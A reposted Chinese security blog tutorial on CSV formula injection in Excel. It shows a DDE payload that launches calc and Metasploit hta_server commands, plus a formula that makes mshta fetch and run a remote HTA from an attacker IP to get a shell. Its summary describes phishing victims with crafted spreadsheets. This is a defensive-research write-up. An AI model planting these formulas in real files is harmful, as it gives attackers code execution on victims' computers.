专栏首页区块链安全技术CSV注入之RCE&社工钓鱼

CSV注入之RCE&社工钓鱼

漏洞介绍

CSV公式注入(CSV Injection)是一种会造成巨大影响的攻击向量,攻击这可以向Excel文件中注入可以输出或以CSV文件读取的恶意攻击载荷,当用户打开Excel文件时,文件会从CSV描述转变为原始的Excel格式,包括Excel提供的所有动态功能,在这个过程中,CSV中的所有Excel公式都会执行,当该函数有合法意图时,很易被滥用并允许恶意代码执行。

漏洞复现

简易测试

在Office的"文件->选项->信任中心"处开启"启用动态数据交换服务器启动"功能:

之后构造以下恶意载荷:

=1+cmd|' /C calc'!A0

之后模拟用户打开Excel文件:

发现载荷成功执行:

反弹Shell

这里使用MSF框架来实施攻击:

use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.174.129
msf exploit(windows/misc/hta_server) > exploit

之后在Excel中插入恶意载荷

=1+cmd|' /C mshta.exe http://192.168.174.129:8888/Agd7QT.hta'!A0

保存之后发送给其他用户:

当用户打开时在MSF端成功上线:

文末小结

CSV注入时常出现在数据导出功能部分,例如:将当前表格数据导出到Excel,此时攻击者可以在当前表格中插入恶意代码,之后当用户导出当前表格数据并保存为Excel,再次打开Excel时便会导致恶意载荷执行,同时CSV注入也可以用于钓鱼,攻击者可以精心构造一个富含大量数据的Excel并插入恶意代码,诱导受害者用户访问并查看,从而触发恶意代码~

本文分享自微信公众号 - 七芒星实验室(HeptagramSec),作者:Al1ex

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2021-08-26

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Gophish钓鱼测试

    Gophish 是一个功能强大的开源网络钓鱼框架,可以轻松测试组织的网络钓鱼风险,专为企业和渗透测试人员设计

    黑白天安全
  • 浅谈

    首先信息收集,是渗透测试中的一项重中之重!如果服务器是一个保险柜,那么你想要打开这个保险柜,首先你得了解它是什么做的,怎么样的架构,才能去考虑怎么动手。

    Gcow安全团队
  • 适用于渗透测试不同阶段的工具收集整理

    该资源清单列表涵盖了一系列,适用于渗透测试不同阶段的开源/商业工具。如果你想为此列表添加贡献,欢迎你向我发送pull request。

    FB客服
  • 社会工程学之钓鱼攻击

    钓鱼攻击是社会工程学攻击的一种方式。钓鱼攻击使用电子邮件或者恶意网站诱骗人们提供个人信息(通常是金融信息)。

    C4rpeDime
  • 近年APT组织常用的攻击漏洞

    APT攻击(Advanced Persistent Threat,高级持续性威胁)是利用当下先进的攻击手法对特定目标进行长期持续性的网络攻击。APT攻击的高级体...

    HACK学习
  • 安全研究 | Slack桌面应用程序的RCE漏洞+XSS漏洞

    对于Slack的桌面应用程序来说,一些应用内跳转、XSS、逻辑重定向和HTML或javascript注入bug,都有可能导致任意代码执行。这篇Writeup就讲...

    FB客服
  • CVE-2020-0796,又是一场补丁攻坚战

    每年真正比较有影响力的漏洞编号,其实并不多,而这个CVE-2020-0796,就是我们在疫情之下全面返岗伊始,最值得去重视的一个。

    Bypass
  • 钓鱼攻击:Gophish邮件钓鱼平台搭建

    目前越来越多的红蓝对抗中,钓鱼邮件攻击使用的越来越频繁,也是比较高效打点的一种方式,常见的钓鱼邮件攻击一种是直接通过二维码,内嵌链接、直接索要敏感信息等方式钓运...

    HACK学习
  • 一种基于机器学习的自动化鱼叉式网络钓鱼思路

    基于社会工程的网络虽攻击出现已久,一直是较为关注的一种有效攻击手段;尤其是鱼叉式网络钓鱼,因其成效显著且传统的安全性防御机制无法阻止这类攻击类型,仍然是大众关注...

    C4rpeDime
  • 浅谈CSV注入漏洞

    某天在逛expdb时候看到了CSV Injection的exp,在渗透测试的过程中也偶尔会遇到类似的情况,这一漏洞很早之前就出现过,但是很多人没有意识到漏洞的危...

    FB客服
  • 邮箱安全服务专题 | 发现那些对钓鱼邮件安全意识淡薄的员工

    上一期我们介绍了针对邮箱应用层和协议层面的安全检测,目前针对邮箱系统自身风险的服务内容已经向大家介绍完了。然而保障了邮箱自身的系统安全还是远远不够的,每一篇邮件...

    安恒信息
  • 实战渗透 | 情侣空间钓鱼邀请,撸它

    此程序是一份仅提供Web编程模仿技术研究,社会工程师水平锻炼,网络防骗流程深入研究的一份程序,并且程序性质不为公开性。

    HACK学习
  • 钓鱼

    鱼叉式网络钓鱼是一种社会工程攻击,其中伪装成可信个人的犯罪行为者欺骗目标点击欺骗电子邮件,短信或即时消息中的链接。因此,目标无意中会泄露敏感信息,在其网络上安装...

    C4rpeDime
  • 一款高度可定制的WiFi钓鱼工具 – WiFiPhisher

    工具简介 WiFiPhisher是一款高度可定制的WiFi钓鱼攻击工具,它可以对具体的WiFI客户端进行攻击,例如获取用户凭证或感染恶意软件。与其他攻击不同的是...

    FB客服
  • 红蓝对抗场景下的二三事

    未知攻焉知防,警察想要抓小偷,就该先摸透小偷的想法,才能更快捷的抓到小偷毕竟小偷抓小偷更容易。网络安全的攻与防,好比“矛”与“盾”,要想不被“矛”轻易刺穿,不仅...

    FB客服
  • 黑客视角揭秘WiFi钓鱼,零信任带来防护突破

    无线钓鱼是一个广受关注但难以根治的热点安全话题。本文中,我将以攻击者视角揭露无线钓鱼攻击的技术原理,包括DNS劫持、Captive Portal、JS缓存投毒等...

    FB客服
  • 社会工程学之基础概念、IP获取、IP物理定位、文件属性社会工程学之基础概念、IP获取、IP物理定位、文件属性

    原文链接;https://blog.csdn.net/Eastmount/article/details/100585715

    天钧
  • 如何利用kali制作一个“钓鱼”网站,以及如何识别

    尽管当今互联网的安全措施已经很完善,但是还是会出现“被盗号”的情况,很多情况下是“有心人”的钓鱼网站导致的,今天的文章主要讲一下kali下使用setoolkit...

    知识与交流
  • 当我们谈到情报 我们在谈论什么

    威胁情报这个概念,自从2014年Gartner提出以后,安全圈就一直在提这个概念,也一直尝试应用这个技术来做一些文章,无论是加在各家的安全产品上做一些对撞,还是...

    字节脉搏实验室

扫码关注云+社区

领取腾讯云代金券